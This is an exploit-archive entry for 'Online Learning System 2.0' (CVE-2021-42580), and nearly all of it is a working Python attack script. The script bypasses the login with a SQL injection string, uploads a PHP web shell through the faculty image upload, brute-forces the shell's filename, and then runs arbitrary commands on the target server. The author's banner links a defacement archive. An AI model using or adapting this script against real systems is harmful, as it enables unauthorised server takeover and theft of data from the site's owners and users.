Online Learning System 2.0 - Remote Code Execution (RCE)

2021-11-16
ID: 104966
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 15/11/2021
# Exploit Author: djebbaranon
# Vendor Homepage: https://github.com/oretnom23
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
# Version: 2.0
# Tested on: Kali linux / Windows 10
# CVE : CVE-2021-42580

#!/usr/bin/python3
import os
import time
import argparse
import requests
import sys
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style
init(autoreset=True)
def banner():
	print('''

 _____       _ _              _                       _                     _____  ______ _____ _____ 
|  _  |     | (_)            | |                     (_)                   / __  \ | ___ /  __ |  ___|
| | | |_ __ | |_ _ __   ___  | | ___  __ _ _ __ _ __  _ _ __   __ _  __   _`' / /' | |_/ | /  \| |__  
| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / /   |    /| |   |  __| 
\ \_/ | | | | | | | | |  __/ | |  __| (_| | |  | | | | | | | | (_| |  \ V /./ /___ | |\ \| \__/| |___ 
 \___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_|  |_| |_|_|_| |_|\__, |   \_/ \_____/ \_| \_|\____\____/ 
                                                               __/ |                                  
                                                              |___/                                   
		Written by djebbaranon 
		twitter :  @dj3bb4ran0n1
		zone-h : http://zone-h.org/archive/notifier=djebbaranon
''')
banner()
def my_args():
	parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
	parser.add_argument("-u","--url",type=str,required=True,help="url of target")
	parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")
	parser.add_argument("-c","--command",type=str,required=True,help="command to execute")
	my_arguments = parser.parse_args()
	return my_arguments
def login_with_sqli_login_bypass(user,passw):
	global session
	global url
	global cookies
	url = my_args().url
	session = requests.Session()
	data = {
	"username" : user,
	"password" : passw,
	}
	try:
		response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)
		print( Fore.GREEN + "[+] Logged in succsusfully")
		cookies = response.cookies.get_dict()
		print("[+] your cookie : ")
	except requests.HTTPError as exception:
		print(Fore.RED + "[-] HTTP Error : {}".format(exception))
		sys.exit(1)
login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")
def main(shell_name,renamed_shell):
	try:
		payload ={
			"id" : "",
			"faculty_id" : "test",
			"firstname" : "test",
			"lastname" : "test",
			"middlename" : "fsdfsd",
			"dob" : "2021-10-29",
			"gender": "Male",
			"department_id" : "1",
			"email" : "[email protected]",
			"contact" : "zebii",
			"address" :  "zebii",	
		}
		files = {
			"img" :
				(
					shell_name,
					"<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>",
					"application/octet-stream",
					)
		}
		vunlerable_file = "/classes/Master.php?f=save_faculty"
		print("[*] Trying to upload webshell ....")
		response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)
		print("[+] trying to bruteforce the webshell ....")
		rangee = my_args().range
		for i in range(0,rangee):
			try:
				with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3:
					if "nikmok" in response3.text and response3.status_code == 200:
						print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n")
						break
						with open("shell.txt",mode="w+") as writer:
							writer.write(response3.url)
					else:
						print( Fore.RED + "[-] shell not found : " + response3.url)
			except requests.HTTPError as exception2:
				print("[-] HTTP Error : {0} ".format(exception2))
	except requests.HTTPError as error:
		print("[-] HTTP Error : ".format(error))
	command = my_args().command
	with requests.get(response3.url.replace("whoami",command)) as response4:
		print("[*] Executing {} ....".format(command))
		time.sleep(3)
		print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)
main("hackerman.php","")
1-4-2 (www01)